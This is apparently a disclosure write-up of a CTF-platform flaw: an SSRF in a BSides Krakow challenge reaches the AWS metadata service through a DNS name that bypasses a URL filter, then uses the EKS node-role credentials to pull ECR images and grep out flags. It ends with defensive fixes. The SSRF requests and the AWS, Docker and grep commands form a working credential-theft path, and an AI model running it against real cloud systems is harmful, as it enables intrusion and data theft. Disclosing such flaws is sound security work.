Writeup

While I wasn’t able to attend BSides Krakow myself, my colleague @Datosh18 was there playing the Capture the Flag and asked if I wanted to take a look at the challenges. This post details how we gained access to the underlying AWS infrastructure hosting the challenges and retrieved multiple flags. Everything in this post was disclosed to the event organisers and the CTF platform team (MetaCTF) prior to publication.

The first challenge I tried presented an application which sent an HTTP request to a user-supplied URL. From prior experience, this smelled of an SSRF scenario. On a hunch that the challenge was probably hosted in AWS, I tried to connect to the AWS instance metadata service (IMDS) at http://169.254.169.254. This was instantly rejected:

Request: 
POST /check HTTP/1.1
Host: fbe1ssag.chals.mctf.io
<-- snip -->

url=http%3A%2F%2F169.254.169.254

Response:
HTTP/1.1 200 OK
Date: Sat, 14 Sep 2024 13:29:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 27

Security block: Invalid URL

Again based on a hunch, I tried requesting metadata.smartyboy.ninja, a subdomain I use to point back to 169.254.169.254 to bypass regex-based protections. To my surprise, this worked.1

Request:
POST /check HTTP/1.1
Host: fbe1ssag.chals.mctf.io
<-- snip -->

url=http%3A%2F%2Fmetadata.smartyboy.ninja

Response:
HTTP/1.1 200 OK
Date: Sat, 14 Sep 2024 13:29:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 336

The site is up. Status code: 200
 Text: 1.0
2007-01-19
<-- snip -->
2022-09-24
latest
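As an aside, this kind of bypass works against any naive substring or regex filter: a check that looks for the literal metadata IP in the submitted URL will happily pass a hostname that resolves to that same address. I don’t know what the challenge’s actual check looked like, but a minimal sketch of such a filter shows the idea:

```shell
# Hypothetical URL filter: reject anything containing the literal metadata IP.
# A DNS name that resolves to 169.254.169.254 sails straight through.
check_url() {
  case "$1" in
    *169.254.169.254*) echo "blocked: $1" ;;
    *)                 echo "allowed: $1" ;;
  esac
}

r1=$(check_url "http://169.254.169.254")
r2=$(check_url "http://metadata.smartyboy.ninja")
echo "$r1"   # blocked: http://169.254.169.254
echo "$r2"   # allowed: http://metadata.smartyboy.ninja
```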

I looked through the IAM roles available to the node and found one named AmazonEKSNodeRole. This is a reasonable indicator that the challenge was hosted in Amazon’s managed Kubernetes service, EKS. To test this hypothesis, I referred to the default permissions for the EKS node role as detailed in https://docs.aws.amazon.com/eks/latest/userguide/create-node-role.html, specifically AmazonEKSWorkerNodePolicy and AmazonEC2ContainerRegistryReadOnly.
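The role listing and its temporary credentials live under a well-known IMDS path; through the SSRF, that path just gets percent-encoded into the url parameter, the same way as the earlier requests. A sketch of building that request body (encoding only : and /, matching the encoding seen above):

```shell
# Build the SSRF request body that fetches the node role's credentials.
# Only ':' and '/' are percent-encoded, matching the earlier requests.
host="metadata.smartyboy.ninja"
path="/latest/meta-data/iam/security-credentials/AmazonEKSNodeRole"
enc=$(printf 'http://%s%s' "$host" "$path" | sed -e 's,:,%3A,g' -e 's,/,%2F,g')
echo "url=$enc"
```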

At this point it did occur to me that I might not be on the intended solve path, but I wanted to see how far the path would take me.2 My first thought was to use the AWS credentials to get a Kubeconfig and authenticate to the relevant EKS cluster. This can be accomplished with the aws eks update-kubeconfig command, which needs the name of the target cluster, something we didn’t have yet. Thankfully, it can be retrieved from the user-data for the EC2 instance:

The site is up. Status code: 200
 Text: [settings.kubernetes]
"cluster-name" = "[REDACT]"
"api-server" = "https://XXXXX.gr7.us-east-1.eks.amazonaws.com"
"cluster-certificate" = "[REDACT]"
"cluster-dns-ip" = "172.20.0.10"
"max-pods" = 110
[settings.kubernetes.node-labels]
"eks.amazonaws.com/nodegroup-image" = "ami-[REDACT]"
"eks.amazonaws.com/capacityType" = "ON_DEMAND"
"eks.amazonaws.com/nodegroup" = "[REDACT]"
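With the cluster name recovered from user-data, the kubeconfig step is a single command. A sketch (printed rather than executed here, since it needs the node’s stolen credentials; the cluster name stays redacted):

```shell
# Sketch only: the command is printed, not run, since it requires the node
# role's temporary credentials. The cluster name comes from the user-data.
cluster="[REDACT]"
cmd="aws eks update-kubeconfig --name $cluster --region us-east-1"
echo "$cmd"
```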

Before getting a Kubeconfig, I wanted to check that the cluster was live and reachable, using aws eks describe-cluster.
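A sketch of that check, with the node’s temporary credentials exported as the usual AWS environment variables (all values are placeholders, and the commands are printed rather than run):

```shell
# Liveness-check sketch: written to a variable and printed, not executed,
# since it needs the credentials retrieved from IMDS.
check=$(cat <<'EOF'
export AWS_ACCESS_KEY_ID=ASIA...        # from the security-credentials response
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws eks describe-cluster --name [REDACT] --region us-east-1
EOF
)
echo "$check"
```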

{
    "cluster": {
        "name": "[REDACT]",
        "arn": "arn:aws:eks:us-east-1:[REDACT]:cluster/[REDACT]",
        "createdAt": "2023-09-16T06:34:36.166000+01:00",
        "version": "1.30",
        "endpoint": "https://[REDACT].gr7.us-east-1.eks.amazonaws.com",
        "roleArn": "arn:aws:iam::[REDACT]:role/EKS_Cluster_Role",
        "resourcesVpcConfig": {
            "subnetIds": [
                "subnet-02[REDACT]",
                "subnet-05[REDACT]",
                "subnet-00[REDACT]",
                "subnet-02[REDACT]"
            ],
            "securityGroupIds": [
                "sg-0e[REDACT]"
            ],
            "clusterSecurityGroupId": "sg-05[REDACT]",
            "vpcId": "vpc-09[REDACT]",
            "endpointPublicAccess": false,
            "endpointPrivateAccess": true,
            "publicAccessCidrs": []
        },
        ...

Damn. Note that in the output above, endpointPublicAccess is set to false. We can’t talk directly to the cluster endpoint. I did attempt to reach the cluster’s API server from some of the challenges which required players to SSH in, but I had no idea whether those SSH endpoints were even in the same cluster. However, our goal was to get flags. Cluster-admin would be nice, but far from required.

Looking at the permissions allocated to an EKS node in a reference architecture, we have two policies. The first, AmazonEKSWorkerNodePolicy, lets us (or more specifically the node’s kubelet, which we’re impersonating) generate tokens for the cluster and perform API server requests. The second, AmazonEC2ContainerRegistryReadOnly, allows the kubelet to log in to ECR repositories and pull images.
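The ECR side is the standard login-then-pull flow. A sketch (printed rather than executed, since it needs the node credentials; the account number, repository, and tag are placeholders):

```shell
# ECR pull-flow sketch: the commands are printed, not run.
# Account number, repository, and tag are placeholders.
registry="[ACCOUNTNUMBER].dkr.ecr.us-east-1.amazonaws.com"
steps=$(cat <<EOF
aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin $registry
docker pull $registry/meta-chal-images:[CHALLENGENAME]
EOF
)
echo "$steps"
```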

With this access, we were able to pull a number of images from an ECR repository named [ACCOUNTNUMBER].dkr.ecr.us-east-1.amazonaws.com/meta-chal-images. I’ll be intentionally vague on details for this last step, but suffice to say we were able to pull challenge images for a number of web-based challenges. Many of these had flags baked into the images, which we could identify by grepping for “CTF” in the expanded image file systems.3

docker save [ACCOUNTNUMBER].dkr.ecr.us-east-1.amazonaws.com/meta-chal-images:[CHALLENGENAME] -o archive.tar
tar -xvf archive.tar
grep -ir "CTF" .
./sha256/a72[REDACT]e8d:{"id":"[REDACT]","parent":"[REDACT]","created":"2023-12-16T18:41:33.638158158Z","container_config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":null},"config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"80/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","FLASK_APP=main.py","flag=MetaCTF{[REDACT]}"],"Cmd":["supervisord","-n"],"ArgsEscaped":true,"Image":"","Volumes":null,"WorkingDir":"/src","Entrypoint":null,"OnBuild":null,"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"22.04"}},"architecture":"amd64","os":"linux"}

This was enough to confirm that I could retrieve a significant number of the flags for our CTF, along with flags for other events live on the platform but not part of our specific event. At this point, I stopped pursuing this path and contacted the event organisers and MetaCTF directly.

Recommendations

The core problem arose because the EKS cluster hosting the challenges did not prevent hosted pods from accessing the AWS metadata endpoint. Per AWS’s recommendations, this can be accomplished in one of two ways:

  • Block access with a Kubernetes NetworkPolicy
  • Use IMDSv2 with a maximum hop count of 1
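For concreteness, here is a sketch of both options. The NetworkPolicy (name is a placeholder, and it assumes a CNI that actually enforces egress policies) denies pod egress to the metadata address; the aws ec2 modify-instance-metadata-options call requires IMDSv2 tokens and caps the PUT response hop limit at 1, which stops pods in their own network namespace from obtaining a token. Both are written out rather than applied, and the instance ID is a placeholder:

```shell
# Option 1: deny pod egress to the IMDS address via NetworkPolicy.
# (Requires a CNI that enforces NetworkPolicy; the name is a placeholder.)
cat > deny-imds.yaml <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-imds
spec:
  podSelector: {}        # applies to every pod in the namespace
  policyTypes: ["Egress"]
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except: ["169.254.169.254/32"]
EOF

# Option 2: require IMDSv2 and cap the PUT response hop limit at 1.
# Printed rather than executed; the instance ID is a placeholder.
echo "aws ec2 modify-instance-metadata-options --instance-id i-0123456789abcdef0 --http-tokens required --http-put-response-hop-limit 1"
```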

I spoke with MetaCTF before publishing this post, and know that at least one of these approaches has been used and the attack path is closed.


  1. I did later work out why, but in the interest of not spoiling the challenge for others, I’m just going to leave this mysterious note instead of explaining. ↩︎

  2. The CTF rules did state that attacking the platform was not permitted. We didn’t submit any of the flags we learned this way. ↩︎

  3. This isn’t a particularly new thing. The earliest similar example I’ve found is from 2017. ↩︎